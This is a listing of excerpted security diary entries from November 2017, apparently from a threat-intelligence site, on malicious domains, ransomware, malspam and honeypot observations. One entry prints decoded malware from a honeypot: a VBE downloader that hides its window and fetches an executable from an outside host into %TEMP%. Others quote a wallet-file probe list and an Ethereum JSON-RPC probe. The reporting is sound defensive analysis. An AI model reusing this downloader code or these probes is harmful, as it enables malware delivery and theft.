Proactive Malicious Domain Search, (Thu, Nov 23rd)

In a previous diary[1], I presented a dashboard that I’m using to keep track of the DNS traffic on my networks. Tracking malicious domains is useful but what if you could, in a certain way, “predict” the upcoming domains that will be used to host phishing pages? Being a step ahead of the attackers is …

Internet Wide Ethereum JSON-RPC Scans, (Tue, Nov 21st)

Ethereum is certainly getting a lot of press this year, and with this, we also see the bad guys spending more effort to steal the shiny, fresh-off-the-digital-mint crypto coins. Ethereum itself is a rather complex beast, but one feature Ethereum nodes provide is a remote access option via RPC. Typically, nodes …

One month later, Magniber ransomware is still out there, (Mon, Nov 20th)

Introduction: Last month, in October 2017, several sources reported a new ransomware family distributed by Magnitude exploit kit (EK) [1, 2, 3]. Security researchers dubbed the new ransomware “Magniber” because it appears to have replaced Cerber ransomware as distributed through Magnitude EK. Cerber seems to have disappeared since then, but as November 2017 progresses, we’re …

Resume-themed malspam pushing Smoke Loader, (Sun, Nov 19th)

Introduction: Malicious spam (malspam) with malware disguised as a resume is a long-running theme frequently used by criminals to push various types of malware. My Online Security reported about a recent wave earlier this month on 2017-11-10. These resume-themed emails contain Word documents with malicious macros, and the macros are designed to infect your …

BTC Pickpockets, (Sat, Nov 18th)

I observed requests to my webserver to retrieve Bitcoin wallet files. The files they are looking for are: wallet – Copy.dat, wallet.dat, wallet.dat.1, wallet.dat.zip, wallet.tar, wallet.tar.gz, wallet.zip, wallet_backup.dat, wallet_backup.dat.1, wallet_backup.dat.zip, wallet_backup.zip. I’ve seen a couple of such requests a couple of years ago, but it’s the first time I’ve seen that many. Please post a …

Top-100 Malicious IP STIX Feed, (Fri, Nov 17th)

Yesterday, we were contacted by one of our readers who asked if we provide a STIX feed of our blocked list or top-100 suspicious IP addresses. STIX[1] means “Structured Threat Information eXpression” and enables organizations to share indicators of compromise (IOCs) with peers in a consistent and machine-readable manner. The ISC already provides an …

Suspicious Domains Tracking Dashboard, (Thu, Nov 16th)

Domain names remain a gold mine to investigate security incidents or to prevent malicious activity from occurring on your network (for example, by using a DNS firewall). The ISC also has a page[1] dedicated to domain names. But how can we detect potentially malicious DNS activity if domains are not (yet) present in a blacklist? …

If you want something done right, do it yourself!, (Wed, Nov 15th)

Another day, another malicious document! I like to discover how creative the bad guys are at writing new pieces of malicious code. Yesterday, I found another interesting sample. It’s always the same story: a malicious document is delivered by email. The document was called ‘Saudi Declare war Labenon.doc’ (interesting name by the way!). According to …

VBE Embedded Script (info.zip), (Mon, Nov 13th)

My honeypot captured several copies of this file info.zip (info.vbe). I used Didier‘s Python script decode-vbe.py to examine the file and obtained the following output:

vagrant@brain:~$ ./decode-vbe.py info.vbe
Set WshShell = CreateObject("WScript.Shell")
If Instr(1,WScript.FullName,"WScript.exe",1)>0 Then
  WshShell.Run "CScript """&WScript.ScriptFullName&"""",0: WScript.Quit
End if
Tmp=WshShell.ExpandEnvironmentStrings("%TEMP%")&"tmp2.exe"
strFileURL = "http://www.testswork.ru/tmp2.exe"
strHDLocation = Tmp
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, …

jsonrpc Scanning for root account, (Mon, Nov 13th)

In the past few weeks I have noticed this type of POST activity showing in my honeypot: {"id":0,"jsonrpc":"2.0","method":"eth_accounts"}, looking for ID 0 (root). Activity has a static source port of 65535 and destination port 8080. Do you have logs to share related to this type of activity?

[1] https://github.com/ethereum/wiki/wiki/JSON-RPC
[2] https://github.com/ethereum/wiki/wiki/JSON-RPC#eth_accounts

-----
Guy Bruneau IPSS …